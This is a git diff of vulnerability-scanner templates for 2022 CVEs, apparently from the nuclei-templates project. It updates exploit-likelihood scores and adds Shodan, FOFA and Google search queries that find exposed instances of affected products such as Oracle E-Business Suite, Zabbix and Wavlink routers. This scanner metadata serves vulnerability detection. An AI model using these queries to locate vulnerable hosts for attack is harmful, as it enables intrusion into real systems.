cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index d9160b01fe..8566b70f96 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: oracle product: weblogic_server + shodan-query: http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" tags: cve,cve2022,lfi,weblogic,oracle,packetstorm http: diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 578dc0e7cb..08fcffe352 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -29,6 +29,8 @@ info: vendor: oracle product: e-business_suite shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + fofa-query: title="login" "x-oracle-dms-ecid" 200 + google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,oracle,misconfig,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index c5277580ff..77b4c625aa 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -19,13 +19,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-21587 cwe-id: CWE-306 - epss-score: 0.97315 - epss-percentile: 0.99868 + epss-score: 0.97364 + epss-percentile: 0.99901 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle product: e-business_suite + shodan-query: http.title:"login" "x-oracle-dms-ecid" 200 + fofa-query: title="login" "x-oracle-dms-ecid" 200 + google-query: intitle:"login" "x-oracle-dms-ecid" 200 tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm http: diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 12a501de58..72d982256a 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -20,14 +20,15 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21661 cwe-id: CWE-89 - epss-score: 0.93536 - epss-percentile: 0.99044 + epss-score: 0.94585 + epss-percentile: 0.99231 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wordpress product: wordpress + shodan-query: cpe:"cpe:2.3:a:wordpress:wordpress" tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress http: diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index b697414512..d21c7dc34d 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-21705 cwe-id: CWE-74,NVD-CWE-Other epss-score: 0.00522 - epss-percentile: 0.76405 + epss-percentile: 0.76813 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 5076610bcf..13b527cbca 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -26,6 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 + fofa-query: body="microweber" tags: cve,cve2022,huntr,microweber,xss,unauth http: diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index bb52187b77..64c38541bb 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -28,6 +28,8 @@ info: vendor: gitlab product: gitlab shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve,cve2022,gitlab http: diff --git a/http/cves/2022/CVE-2022-2187.yaml b/http/cves/2022/CVE-2022-2187.yaml index d09c6195c5..09e691be79 100644 --- a/http/cves/2022/CVE-2022-2187.yaml +++ b/http/cves/2022/CVE-2022-2187.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-2187 cwe-id: CWE-79 - epss-score: 0.00122 - epss-percentile: 0.46372 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2219.yaml b/http/cves/2022/CVE-2022-2219.yaml index e8d92c1859..9de47d4adc 100644 --- a/http/cves/2022/CVE-2022-2219.yaml +++ b/http/cves/2022/CVE-2022-2219.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-2219 cwe-id: CWE-79 epss-score: 0.00159 - epss-percentile: 0.51461 + epss-percentile: 0.52368 cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index 0cf4e3db0a..f739623a46 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-22242 cwe-id: CWE-79 - epss-score: 0.41023 - epss-percentile: 0.972 + epss-score: 0.43644 + epss-percentile: 0.97362 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,8 @@ info: vendor: juniper product: junos shodan-query: title:"Juniper Web Device Manager" + fofa-query: title="juniper web device manager" + google-query: intitle:"juniper web device manager" tags: cve2022,cve,xss,juniper,junos http: diff --git a/http/cves/2022/CVE-2022-22536.yaml b/http/cves/2022/CVE-2022-22536.yaml index 58113edda8..dd373be29c 100644 --- a/http/cves/2022/CVE-2022-22536.yaml +++ b/http/cves/2022/CVE-2022-22536.yaml @@ -20,14 +20,15 @@ info: cvss-score: 10 cve-id: CVE-2022-22536 cwe-id: CWE-444 - epss-score: 0.96507 - epss-percentile: 0.99572 + epss-score: 0.96479 + epss-percentile: 0.99584 cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sap product: content_server shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev http: diff --git a/http/cves/2022/CVE-2022-22733.yaml b/http/cves/2022/CVE-2022-22733.yaml index f1619bc1af..977cdf3239 100644 --- a/http/cves/2022/CVE-2022-22733.yaml +++ b/http/cves/2022/CVE-2022-22733.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2022-22733 cwe-id: CWE-200 - epss-score: 0.12656 - epss-percentile: 0.95328 + epss-score: 0.2493 + epss-percentile: 0.96665 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 + fofa-query: icon_hash=816588900 tags: cve2022,cve,exposure,sharingsphere,apache http: diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index dff0f8b418..57d2759bcc 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -29,6 +29,8 @@ info: vendor: trilium_project product: trilium shodan-query: title:"Trilium Notes" + fofa-query: title="trilium notes" + google-query: intitle:"trilium notes" tags: cve,cve2022,xss,trilium,huntr,trilium_project http: diff --git a/http/cves/2022/CVE-2022-22947.yaml b/http/cves/2022/CVE-2022-22947.yaml index a0f0967a95..50068f89aa 100644 --- a/http/cves/2022/CVE-2022-22947.yaml +++ b/http/cves/2022/CVE-2022-22947.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2022-22947 cwe-id: CWE-917,CWE-94 - epss-score: 0.97494 - epss-percentile: 0.99975 + epss-score: 0.97488 + epss-percentile: 0.99973 cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index 02d131fa6e..1a35013e99 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -28,6 +28,7 @@ info: vendor: vmware product: identity_manager shodan-query: http.favicon.hash:-1250474341 + fofa-query: icon_hash=-1250474341 tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti http: diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 2ceac3d1c7..d08ce8fc8a 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -15,19 +15,21 @@ info: - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + - https://github.com/djytmdj/Tool_Summary classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22972 cwe-id: CWE-287 - epss-score: 0.7146 - epss-percentile: 0.9778 + epss-score: 0.55025 + epss-percentile: 0.97657 cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* metadata: max-request: 3 vendor: vmware product: identity_manager fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + shodan-query: http.favicon.hash:-1250474341 tags: cve2022,cve,vmware,auth-bypass,oast http: diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 2ca0d8a91c..629c17175b 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -29,6 +29,8 @@ info: vendor: siemens product: sinema_remote_connect_server shodan-query: title:"Logon - SINEMA Remote Connect" + fofa-query: title="logon - sinema remote connect" + google-query: intitle:"logon - sinema remote connect" tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens http: diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index 552d606dda..399deab755 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -13,13 +13,14 @@ info: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - https://github.com/1mxml/CVE-2022-23131 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-23131 cwe-id: CWE-290 - epss-score: 0.96952 - epss-percentile: 0.9967 + epss-score: 0.9708 + epss-percentile: 0.99771 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -27,6 +28,7 @@ info: product: zabbix shodan-query: http.favicon.hash:892542951 fofa-query: app="ZABBIX-监控系统" && body="saml" + google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev http: diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index 6465ac9df7..c401309a90 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -20,13 +20,16 @@ info: cvss-score: 5.3 cve-id: CVE-2022-23134 cwe-id: CWE-287,CWE-284 - epss-score: 0.34559 - epss-percentile: 0.9671 + epss-score: 0.6298 + epss-percentile: 0.97835 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: zabbix product: zabbix + shodan-query: http.favicon.hash:892542951 + fofa-query: icon_hash=892542951 + google-query: intitle:"zabbix-server" tags: cve,cve2022,zabbix,auth-bypass,kev http: diff --git a/http/cves/2022/CVE-2022-23178.yaml b/http/cves/2022/CVE-2022-23178.yaml index edb89757c5..278b49ff48 100644 --- a/http/cves/2022/CVE-2022-23178.yaml +++ b/http/cves/2022/CVE-2022-23178.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-23178 cwe-id: CWE-287 epss-score: 0.03228 - epss-percentile: 0.90998 + epss-percentile: 0.91216 cpe: cpe:2.3:o:crestron:hd-md4x2-4k-e_firmware:1.0.0.2159:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 39814e8c68..758261c087 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-23347 cwe-id: CWE-22 - epss-score: 0.1468 - epss-percentile: 0.95635 + epss-score: 0.11382 + epss-percentile: 0.95203 cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: bigantsoft product: bigant_server shodan-query: http.html:"BigAnt" + fofa-query: body="bigant" tags: cve,cve2022,bigant,lfi,bigantsoft http: diff --git a/http/cves/2022/CVE-2022-23348.yaml b/http/cves/2022/CVE-2022-23348.yaml index 9e7bd3de0f..7096f4a628 100644 --- a/http/cves/2022/CVE-2022-23348.yaml +++ b/http/cves/2022/CVE-2022-23348.yaml @@ -28,6 +28,7 @@ info: vendor: bigantsoft product: bigant_server shodan-query: http.html:"bigant" + fofa-query: body="bigant" tags: cve,cve2022,bigant,unauth,exposure,bigantsoft http: diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index f24c78cefe..36bc153572 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 - epss-score: 0.00083 - epss-percentile: 0.34435 + epss-score: 0.00094 + epss-percentile: 0.3975 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2022/CVE-2022-2376.yaml b/http/cves/2022/CVE-2022-2376.yaml index 4ae33db0af..4772bf8473 100644 --- a/http/cves/2022/CVE-2022-2376.yaml +++ b/http/cves/2022/CVE-2022-2376.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2376 cwe-id: CWE-862 - epss-score: 0.04177 - epss-percentile: 0.92016 + epss-score: 0.03672 + epss-percentile: 0.91725 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index a9ace28b9a..478a084daf 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -28,6 +28,8 @@ info: vendor: zohocorp product: manageengine_desktop_central fofa-query: app="ZOHO-ManageEngine-Desktop" + shodan-query: http.title:"manageengine desktop central 10" + google-query: intitle:"manageengine desktop central 10" tags: cve,cve2022,zoho,exposure,zohocorp http: diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 4d9d63a2b9..9b5ac28319 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-23808 cwe-id: CWE-79 - epss-score: 0.00743 - epss-percentile: 0.78912 + epss-score: 0.00758 + epss-percentile: 0.81074 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,9 @@ info: vendor: phpmyadmin product: phpmyadmin shodan-query: http.component:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2022,phpmyadmin,xss http: diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index 57f57cb54d..946982dcce 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -14,13 +14,15 @@ info: - https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531 - https://wordpress.org/plugins/feed-them-social/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2383 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2383 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45893 + epss-score: 0.00106 + epss-percentile: 0.43227 cpe: cpe:2.3:a:slickremix:feed_them_social:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -29,7 +31,6 @@ info: product: feed_them_social framework: wordpress tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index f85f68fd1d..c133c55f52 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -30,6 +30,7 @@ info: vendor: aveva product: intouch_access_anywhere shodan-query: http.html:"InTouch Access Anywhere" + fofa-query: body="intouch access anywhere" tags: cve,cve2022,lfi,packetstorm,aveva,intouch http: diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index 23123219c9..0c3901d89a 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-23898 cwe-id: CWE-89 epss-score: 0.0161 - epss-percentile: 0.87161 + epss-percentile: 0.87425 cpe: cpe:2.3:a:mingsoft:mcms:5.2.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index d023a06b4a..e7512f0d03 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 - epss-score: 0.97261 - epss-percentile: 0.99825 + epss-score: 0.97411 + epss-percentile: 0.99928 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -28,6 +28,7 @@ info: product: apisix shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" + google-query: intitle:"apache apisix dashboard" tags: cve,cve2022,apache,rce,apisix,oast,kev,intrusive http: diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 0a37dac7d6..c585c9bb99 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -20,14 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24124 cwe-id: CWE-89 - epss-score: 0.07543 - epss-percentile: 0.93981 + epss-score: 0.08991 + epss-percentile: 0.94589 cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: casbin product: casdoor shodan-query: http.title:"Casdoor" + fofa-query: title="casdoor" + google-query: intitle:"casdoor" tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin http: diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index 0f72b8b9b3..ae3e15df0c 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -29,6 +29,7 @@ info: product: dogtagpki shodan-query: title:"Identity Management" html:"FreeIPA" fofa-query: title="Identity Management" + google-query: intitle:"identity management" html:"freeipa" tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki http: diff --git a/http/cves/2022/CVE-2022-24181.yaml b/http/cves/2022/CVE-2022-24181.yaml index b3b7ce9f12..fca2d60c99 100644 --- a/http/cves/2022/CVE-2022-24181.yaml +++ b/http/cves/2022/CVE-2022-24181.yaml @@ -29,6 +29,7 @@ info: max-request: 1 vendor: public_knowledge_project product: open_journal_systems + shodan-query: cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems" tags: cve,cve2022,xss,oss,pkp-lib,edb,public_knowledge_project http: diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index b23a28e956..87f233070e 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -20,14 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 - epss-score: 0.28138 - epss-percentile: 0.96726 + epss-score: 0.25256 + epss-percentile: 0.96681 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" + fofa-query: title="voipmonitor" + google-query: intitle:"voipmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth http: diff --git a/http/cves/2022/CVE-2022-24264.yaml b/http/cves/2022/CVE-2022-24264.yaml index 8b01b0a101..162c3e8803 100644 --- a/http/cves/2022/CVE-2022-24264.yaml +++ b/http/cves/2022/CVE-2022-24264.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24264 cwe-id: CWE-89 - epss-score: 0.04717 - epss-percentile: 0.91844 + epss-score: 0.11196 + epss-percentile: 0.95163 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index c8fabc2f2b..8a6a582d0a 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-24266 cwe-id: CWE-89 - epss-score: 0.03412 - epss-percentile: 0.91229 + epss-score: 0.07762 + epss-percentile: 0.94189 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 8aa55a92ad..784c856b13 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -29,6 +29,8 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" + fofa-query: title="sign in - airflow" + google-query: intitle:"sign in - airflow" tags: cve,cve2022,airflow,rce,apache http: diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index 735634f0ff..0c0b51b1dd 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-24384 cwe-id: CWE-79 epss-score: 0.00084 - epss-percentile: 0.34937 + epss-percentile: 0.35729 cpe: cpe:2.3:a:smartertools:smartertrack:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: smartertools product: smartertrack shodan-query: http.favicon.hash:1410071322 + fofa-query: icon_hash=1410071322 tags: cve,cve2022,xss,smartertrack,smartertools http: diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 251b1da63f..d3cb312564 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -24,8 +24,9 @@ info: vendor: audiocodes product: device_manager_express shodan-query: title:"Audiocodes" + fofa-query: title="audiocodes" + google-query: intitle:"audiocodes" tags: cve,cve2022,seclists,sqli,audiocodes - flow: http(1) && http(2) http: diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 1cd1c7e9e0..0153e3b3d4 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -28,6 +28,9 @@ info: max-request: 1 vendor: zohocorp product: manageengine_adselfservice_plus + shodan-query: http.title:"manageengine" + fofa-query: title="manageengine" + google-query: intitle:"adselfservice plus" tags: cve,cve2022,manageengine,xss,authenticated,zohocorp http: diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 8ced979300..e61feb47cc 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -28,6 +28,8 @@ info: vendor: icinga product: icinga_web_2 shodan-query: title:"Icinga" + fofa-query: title="icinga web 2 login" + google-query: intitle:"icinga" tags: cve,cve2022,packetstorm,icinga,lfi http: diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 867ca9a9d9..a877ca379b 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-24856 cwe-id: CWE-918 epss-score: 0.08397 - epss-percentile: 0.94255 + epss-percentile: 0.94394 cpe: cpe:2.3:a:flyte:flyte_console:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index 3d4861baab..65623c2276 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -22,13 +22,13 @@ info: cve-id: CVE-2022-2486 cwe-id: CWE-78 epss-score: 0.97331 - epss-percentile: 0.99879 - cpe: cpe:2.3:o:wavlink:wl-wn535k2_firmware:-:*:*:*:*:*:*:* + epss-percentile: 0.99885 + cpe: cpe:2.3:h:wavlink:wl-wn535k2:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: wavlink - product: wl-wn535k2_firmware + product: wl-wn535k2 shodan-query: http.title:"Wi-Fi APP Login" tags: cve2022,cve,iot,wavlink,router,rce,oast diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 10b7510a7e..8dedab97e0 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -29,6 +29,8 @@ info: vendor: wavlink product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast variables: cmd: "id" diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 3f428bc088..e2316e3ad5 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -30,6 +30,8 @@ info: vendor: wavlink product: wl-wn535k2_firmware shodan-query: http.title:"Wi-Fi APP Login" + fofa-query: title="wi-fi app login" + google-query: intitle:"wi-fi app login" tags: cve,cve2022,iot,wavlink,router,rce,oast http: diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index ec78a7b42d..177e89d6c2 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -28,6 +28,8 @@ info: vendor: contao product: contao shodan-query: title:"Contao" + fofa-query: body="contao open source cms" + google-query: intitle:"contao" tags: cve,cve2022,contao,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 5197c4d2ea..1380d9c461 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -15,13 +15,14 @@ info: - https://vuldb.com/?id.198714 - https://nvd.nist.gov/vuln/detail/CVE-2022-24900 - https://github.com/onlaj/Piano-LED-Visualizer/commit/3f10602323cd8184e1c69a76b815655597bf0ee5 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2022-24900 cwe-id: CWE-668,CWE-22 epss-score: 0.00999 - epss-percentile: 0.81936 + epss-percentile: 0.83586 cpe: cpe:2.3:a:piano_led_visualizer_project:piano_led_visualizer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index 5c748465de..98e6deb6ea 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-25082 cwe-id: CWE-78 epss-score: 0.0417 - epss-percentile: 0.92009 + epss-percentile: 0.92196 cpe: 